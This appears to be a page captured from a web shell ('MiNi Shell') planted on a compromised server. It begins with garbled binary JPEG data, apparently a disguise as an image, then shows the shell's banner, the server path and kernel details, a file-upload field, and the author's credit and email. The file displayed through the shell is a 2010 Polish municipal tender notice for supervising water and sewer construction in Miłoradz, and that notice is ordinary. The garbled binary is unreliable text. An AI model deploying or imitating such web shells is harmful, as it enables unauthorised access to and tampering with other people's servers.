JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100122/19056-N-2010.html

<p class="kh_header"><b>Miłoradz: Prowadzenie nadzoru inwestorskiego nad wykonaniem budowy sieci wodociągowej i kanalizacji sanitarnej w miejscowościach Gnojewo ,Pogorzała Wieś ,Mątowy Wielkie w gminie wiejskiej Miłoradz</b><br>
<b>Numer ogłoszenia: 19056 - 2010; data zamieszczenia: 22.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miłoradz , ul. Żuławska 9, 82-213 Miłoradz, woj. pomorskie, tel. 055 2711531, faks 055 2711565.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miloradz.malbork.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.miloradz.malbork.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie nadzoru inwestorskiego nad wykonaniem budowy sieci wodociągowej i kanalizacji sanitarnej w miejscowościach Gnojewo ,Pogorzała Wieś ,Mątowy Wielkie w gminie wiejskiej Miłoradz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Prowadzenie nadzoru inwestorskiego nad wykonaniem budowy sieci wodociągowej i kanalizacji sanitarnej w miejscowościach Gnojewo ,Pogorzała Wieś ,Mątowy Wielkie w gminie wiejskiej Miłoradz.

2.Szczegółowy zakres prowadzenia nadzoru inwestorskiego polegać będzie na:

a) reprezentowaniu inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem , pozwoleniem na budowę ,przepisami ,obowiązującymi polskimi normami oraz zasadami wiedzy technicznej
b) udziału w przekazaniu przez Zamawiającego placu i terenu budowy Wykonawcy robót,
c) sprawdzenia prawidłowości wykonania robót zgodnie z opracowaną dokumentacją techniczną, specyfikacjami technicznymi wykonania i odbioru robót i pozwoleniem na budowę
d) udziału w naradach , komisjach technicznych, częściowych i końcowych odbiorach inwestycji 
e) udział przy rozliczeniu inwestycji przez Samorząd Województwa Pomorskiego w ramach PROW.
f) wizytowanie budowy minimum 3 razy w tygodniu ,potwierdzone wpisem do dziennika budowy,
g) udział w czynnościach związanych z ujawnieniem i usunięciem wad w okresie rękojmi oraz przeglądach gwarancyjnych organizowanych przez Zamawiającego.
h) nanoszenie zmian w dokumentacji technicznej , w związku z nieprzewidzianymi robotami  wynikłymi w trakcie realizacji inwestycji.


Zakres  obejmuje:
Prowadzenie nadzoru inwestorskiego nad:

budową sieci wodociągowej i przepompowni ścieków we wsi Gnojewo:

- sieć wodociągowa  fi 90 mm PE       -   1372,50 m
- przepompownia ścieków  z wyposażeniem                -      kpl.1

budową sieci i przyłączy kanalizacji sanitarnej w Pogorzałej Wsi:

- sieć grawitacyjna fi 160 mm PVC    -   25 mb
                               fi 200 mm PVC     - 2346 mb
                               fi 200 mm PE        -   192,50 mb
- sieć tłoczna          fi 160 mm PE       -  3508,50 mb 
                               fi 125 mm PE      -  1071,50 mb
                               fi 90 mm PE       -     719,50 mb
                               fi 75 mm PE       -     794,50 mb
                               fi 63 mm PE       -     404 mb
- przyłącza             fi 200 mm PVC   -       42 mb
                              fi 160 mm PVC   -     13,50 mb
                              fi 160 mm PE      -    1039 mb
- przepompownie ścieków  z wyposażeniem           -     kpl.6     

budową sieci i  przyłączy kanalizacji sanitarnej w Mątowach Wielkich:

- sieć grawitacyjna fi 160 mm PVC  -  41 mb
                               fi 200 mm PVC  -2302,50mb
                               fi 315 mm PVC  - 4,0 mb
                               fi 200 mm PE  -  180 mb
- sieć tłoczna          fi 110 mm PE  -  4117,50 mb
                               fi 90 mm PE -   146 mb
                               fi 75 mm PE  -  638 mb
                               fi 63 mm PE  -  63,50 mb
- przyłącza             fi 200 mm PVC - 117,50 mb
                               fi 160 mm PVC - 991 mb
- przepompownie ścieków z wyposażeniem          -  kpl.3

Szczegółowy zakres robót zawiera : specyfikacja wykonania i odbioru robót  oraz przedmiar robót.
Roboty należy wykonać zgodnie z dokumentacją  projektową która jest do wglądu w siedzibie Zamawiającego - pok.nr10 oraz znajduje się na stronie internetowej zamawiającego www.wrotapomorza.pl, jak również z załączonym przedmiarem  robót oraz specyfikacją techniczną..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W przetargu nie jest wymagane wniesienie wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki udziału w postępowaniu

O udzielenie zamówienia mogą ubiegać się oferenci, którzy :

      1) Spełniają warunki określone w artykule 22 ust.1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych
      2) Posiadają  doświadczenie w zakresie niezbędnym do wykonania zamówienia , to jest wykonali w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym krótszym okresie co najmniej dwie usługi - prowadzenia nadzorów inwestorskich nad  robotami budowlanymi o podobnym charakterze jak opisywane zamówienie (budowa sieci  kanalizacyjnej wraz z przyłączami ,przepompowniami ścieków, instalacjami elektrycznymi    ,studzienkami   ,potwierdzone referencjami).
      3) dysponują co najmniej jedną osobą ,która będzie pełnić funkcję inspektora nadzoru, posiadającą uprawnienia budowlane do wykonywania nadzoru inwestorskiego w zakresie budowy sieci wodociągowej i kanalizacji sanitarnej  , przy czym osoba ta musi posiadać co najmniej trzyletnie doświadczenie zawodowe w zakresie pełnienia funkcji inspektora nadzoru w zakresie budowy sieci wodociągowej i kanalizacji sanitarnej.

Warunki szczegółowe wymagane od wykonawców: 
      4) złożą formularz ofertowy wraz z wymaganymi dokumentami,oświadczeniami,  
          załącznikami oraz zaświadczeniami wymaganymi treścią siwz
      
      2.Opis sposobu dokonania oceny spełniania warunków.
      
     Ocena warunków będzie odbywać się  w oparciu o zasadę spełnia - nie spełnia, czyli jeżeli Wykonawca wymagane postanowieniami niniejszej SIWZ oświadczenia oraz dokumenty załączy do oferty, wówczas spełni postawione warunki udziału w postępowaniu.Przy czym oświadczenia i dokumenty muszą być zgodne z wymaganiami SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.W celu potwierdzenia przez wykonawcę spełnienia warunków udziału w postępowaniu Zamawiający żąda załączenia do oferty następujących dokumentów:

a) - oświadczenia ,że Wykonawca spełnia warunki  określone w art.22 ust.1 Pzp - wzór stanowi załącznik do SIWZ
b) wykaz  co najmniej dwóch usług odpowiadających charakterowi zamówienia oraz o porównywalnej wartości w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia , wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym krótszym okresie, z podaniem zakresu i wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających ,że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone
c) - wykazu osób ,które będą uczestniczyć w wykonywaniu zamówienia zawierający potwierdzenie posiadania wymaganych kwalifikacji i doświadczenia w tego typu usługach (minimum: jedna osoba z uprawnieniami branży sanitarnej  z doświadczeniem co najmniej 3 lata    pracy w zawodzie)

2. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy,Zamawiający żąda załączenia do oferty następujących dokumentów:

a) - oświadczenia ,że wykonawca nie podlega wykluczeniu z postępowania o udzieleniu zamówienia publicznego na podstawie art.24 ust.1 Pzp.
b)- aktualnego odpisu z właściwego rejestru , jeżeli odrębne przepisy wymagają wpisu do rejestru (Np. Krajowego Rejestru Sądowego), w celu wykazania braku podstaw do wykluczenia w oparciu o art.24 ust.1 pkt.2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert , a w stosunku do osób fizycznych oświadczenia w zakresie art.24 ust.1 pkt.2 ustawy
c)- aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego ,że wykonawca nie zalega z opłacaniem podatków lub zaświadczenie ,że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
d)- aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych ,potwierdzającego ,że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne ,lub potwierdzenia ,że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3  miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.

3. Dokumenty dodatkowe
a) Kopie uprawnień osób przewidywanych do realizacji przedmiotu zamówienia w tym obowiązkowo i ze wskazaniem osób do pełnienia funkcji: inspektora nadzoru/ w poszczególnych branżach/ wraz z kopiami zaświadczeń o wpisie na odpowiednią listę.
b) Obowiązkowo protokóły odbioru zadań tożsamych z przedmiotem zamówienia. W wykazie nadzorowanych zadań za ostatnie 5 lata wyraźnie zaznaczyć zadania tożsame.

!!! Zamawiający zastrzega sobie prawo żądania do wglądu oryginałów dokumentów, które Wykonawca załączy do oferty w postaci kserokopii.

Wyżej wymienione dokumenty mogą być złożone w formacie oryginałów lub kserokopii potwierdzonych za zgodność przez osobę lub osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.wrotapomorza.pl/pl/bip/gminy/miloradz/zamowienia/ogloszenia_inwestycyjne.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Miłoradzu
ul. Żuławska 9
82-213 Miłoradz
pok. nr 10.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2010 godzina 10:00, miejsce: Urząd Gminy w Miłoradzu
ul. Żuławska 9
82-213 Miłoradz
pok. nr 1 Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com